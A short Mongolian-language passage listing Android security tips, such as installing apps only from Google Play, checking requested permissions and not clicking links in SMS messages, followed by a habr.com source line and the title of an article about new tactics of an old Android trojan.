- Android үйлдлийн системтэй гар утасны төхөөрөмжид Google Play-ээс өөр эх сурвалжаас програм суулгахгүй байх
- Аппликешныг суулгахдаа програмын хүссэн эрхүүдэд онцгой анхаарал хандуулах хэрэгтэй
- татаж авсан файлуудын өргөтгөлүүдэд анхаарлаа хандуулаарай
- Android үйлдлийн системийн шинэчлэлтүүдийг тогтмол суулгана
- сэжигтэй эх сурвалжид зочилж, тэндээс файл татаж авахгүй байх
- SMS мессежээр ирсэн холбоос дээр дарж болохгүй.

Эх сурвалж: www.habr.com

Лейся, Фанта: хуучин Android Trojan-д зориулсан шинэ тактик